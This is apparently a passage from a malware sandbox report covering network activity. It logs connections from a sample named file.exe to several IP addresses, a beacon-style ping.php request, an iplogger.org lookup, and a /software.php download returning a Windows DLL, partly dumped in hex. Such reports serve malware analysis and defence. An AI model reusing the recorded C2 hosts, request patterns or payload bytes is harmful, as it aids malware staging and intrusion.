Oct 3, 2022 17:43:01.931171894 CEST	443	49712	148.251.234.83	192.168.2.6
Oct 3, 2022 17:43:01.961195946 CEST	443	49712	148.251.234.83	192.168.2.6
Oct 3, 2022 17:43:01.961251974 CEST	443	49712	148.251.234.83	192.168.2.6
Oct 3, 2022 17:43:01.961333990 CEST	49712	443	192.168.2.6	148.251.234.83
Oct 3, 2022 17:43:41.185956955 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:41.186975956 CEST	49713	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:41.214673042 CEST	80	49713	208.67.104.97	192.168.2.6
Oct 3, 2022 17:43:41.214853048 CEST	49713	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:41.216011047 CEST	49713	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:41.246062994 CEST	80	49713	208.67.104.97	192.168.2.6
Oct 3, 2022 17:43:41.474133015 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:42.079955101 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:43.067961931 CEST	80	49713	208.67.104.97	192.168.2.6
Oct 3, 2022 17:43:43.070406914 CEST	49713	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:43.181468010 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.208403111 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.208528996 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.209049940 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.236076117 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.236627102 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.236772060 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.283149004 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:43.308698893 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.335825920 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336393118 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336417913 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336436033 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336455107 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336472034 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336488008 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336503983 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336520910 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336536884 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336554050 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.336566925 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.336566925 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.336652994 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.363478899 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365436077 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365462065 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365485907 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365509033 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365531921 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365546942 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365555048 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365580082 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365606070 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365607023 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365607023 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365622997 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365631104 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365674019 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365674973 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365699053 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365700006 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365710974 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365726948 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365750074 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365762949 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365777969 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365788937 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365802050 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365812063 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365824938 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365848064 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365860939 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365870953 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365894079 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.365895987 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365921974 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.365931988 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.392805099 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.392848969 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.392877102 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.392903090 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.392908096 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.392931938 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.392950058 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.392961025 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.392976999 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.392992020 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393002987 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393022060 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393028021 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393066883 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393076897 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393083096 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393094063 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393119097 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393125057 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393152952 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393155098 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393178940 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393186092 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393194914 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393217087 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393218040 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393245935 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393251896 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393276930 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393281937 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393311024 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393337965 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393364906 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393364906 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393393993 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393395901 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393413067 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393426895 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393443108 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393456936 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393470049 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393485069 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393507957 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393520117 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393538952 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393543959 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393568039 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393575907 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393595934 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393601894 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393623114 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393646955 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393660069 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393678904 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393682957 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393762112 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393790960 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393801928 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393820047 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393826008 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393848896 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393853903 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393876076 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393882990 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393906116 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393932104 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393943071 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393959045 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.393965006 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.393987894 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.394028902 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.420798063 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.420857906 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.420886993 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.420913935 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:43.420995951 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.421066046 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:43.514349937 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:43.541846037 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:43.542449951 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:43.576761007 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:43.603879929 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:44.124228001 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:44.124358892 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:45.689646006 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:46.440035105 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:46.467046022 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:46.964653969 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:46.965800047 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:48.071784019 CEST	80	49713	208.67.104.97	192.168.2.6
Oct 3, 2022 17:43:48.071978092 CEST	49713	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:48.396512032 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:48.396653891 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:49.006376982 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:49.034013987 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:49.520315886 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:49.520401001 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:50.502554893 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:51.568469048 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:51.595576048 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:52.092350960 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:52.092470884 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:54.145493984 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:54.172667027 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:54.672375917 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:54.672640085 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:55.144954920 CEST	49714	80	192.168.2.6	107.182.129.235
Oct 3, 2022 17:43:55.145284891 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:43:55.145811081 CEST	49713	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:43:55.172305107 CEST	80	49714	107.182.129.235	192.168.2.6
Oct 3, 2022 17:43:55.172926903 CEST	80	49713	208.67.104.97	192.168.2.6
Oct 3, 2022 17:43:55.456046104 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:43:56.065490961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:43:56.709244013 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:56.736669064 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:57.240268946 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:57.240618944 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:57.268747091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:43:59.286329031 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:43:59.313591003 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:59.675254107 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:43:59.814461946 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:43:59.814744949 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:44:00.112734079 CEST	49710	80	192.168.2.6	208.67.104.97
Oct 3, 2022 17:44:02.014844894 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:44:02.041944027 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:44:02.541059971 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:44:02.541615963 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:44:04.488095045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:44:04.922621965 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:44:04.950467110 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:44:05.470845938 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:44:05.470974922 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:44:07.506227016 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:44:07.533510923 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:44:08.069984913 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:44:08.070177078 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:44:10.115916967 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:44:10.143142939 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:44:10.645729065 CEST	80	49715	171.22.30.106	192.168.2.6
Oct 3, 2022 17:44:10.645878077 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:44:12.998562098 CEST	49715	80	192.168.2.6	171.22.30.106
Oct 3, 2022 17:44:14.098301888 CEST	49711	80	192.168.2.6	85.31.46.167

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 17:43:01.238493919 CEST	56331	53	192.168.2.6	8.8.8.8
Oct 3, 2022 17:43:01.259056091 CEST	53	56331	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2022 17:43:01.238493919 CEST	192.168.2.6	8.8.8.8	0x8600	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2022 17:43:01.259056091 CEST	8.8.8.8	192.168.2.6	0x8600	No error (0)	iplogger.org		148.251.234.83	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

iplogger.org

208.67.104.97

85.31.46.167

107.182.129.235

171.22.30.106

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49712	148.251.234.83	443	C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49710	208.67.104.97	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 17:42:17.386774063 CEST	100	OUT	GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 208.67.104.97 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:42:19.242346048 CEST	100	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:42:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49711	85.31.46.167	80	C:\Users\user\Desktop\file.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 17:42:20.348063946 CEST	101	OUT	GET /software.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: D Host: 85.31.46.167 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2022 17:42:20.375627995 CEST	102	IN	HTTP/1.1 200 OK Date: Mon, 03 Oct 2022 15:42:20 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="dll"; Content-Transfer-Encoding: binary Content-Length: 242176 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}:s(2rp(;&Vrprp(>}(Co(D(E}(F(E(G&>}(Co(D}(F(E(H&">}R} { oo*{
Oct 3, 2022 17:42:20.375648975 CEST	103	IN	Data Raw: 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02 7b 23 00 00 04 02 7b 1f 00 00 04 6f 70 00 00 0a 02 7b 1f 00 00 04 2c 0d 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 02 02 7b 21 00 00 04 6f 6f 00 00 0a 2a 1e 02 Data Ascii: "}!{!}{#{op{,{ oo{!oo{Bsu(v{#{#owox(+oy{,{ oo+{!oo(2z,{",{"o/(z((X[((
Oct 3, 2022 17:42:20.375668049 CEST	105	IN	Data Raw: 00 00 0a 2a 1e 02 7b 54 00 00 04 2a 22 02 03 7d 54 00 00 04 2a 32 02 7b 65 00 00 04 6f fb 00 00 0a 2a 36 02 7b 65 00 00 04 03 6f fc 00 00 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 Data Ascii: {T"}T2{eo6{eo{R2{coR}U{coo{Q"}Q2{cow~{coy}]so2{cosN{cop(2{dosN{dop({V*R}Vs(
Oct 3, 2022 17:42:20.375686884 CEST	106	IN	Data Raw: 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00 04 2a 4e 02 Data Ascii: {r"}r(0{s"}s{t"}t{u"}uN((((z,{v,{vo/((5"}xN{o9o<&{\|f}\|{{\|o2{o?*{o9(o@
Oct 3, 2022 17:42:20.375704050 CEST	107	IN	Data Raw: 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01 00 06 2a 1e 02 7b 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e Data Ascii: p}rp}(({{{"}{"}{(dt%r2poeoftogz,{,{o/(rp}rp}sm}(}V}(}({*"}
Oct 3, 2022 17:42:20.375720978 CEST	108	IN	Data Raw: 00 04 02 28 da 01 00 06 2a 1e 02 7b d0 00 00 04 2a 3a 02 03 7d d0 00 00 04 02 28 da 01 00 06 2a f6 02 28 9a 00 00 0a 02 7b d7 00 00 04 6f 9a 00 00 0a 02 7b cd 00 00 04 18 5a 58 2f 1a 02 02 7b d7 00 00 04 6f 9a 00 00 0a 02 7b cd 00 00 04 19 5a 58 Data Ascii: ({:}(({o{ZX/{o{ZX((J{oooJ{oxo2{o6{o2{o\|6{o}2{o~6{o6{o&*v{rpo
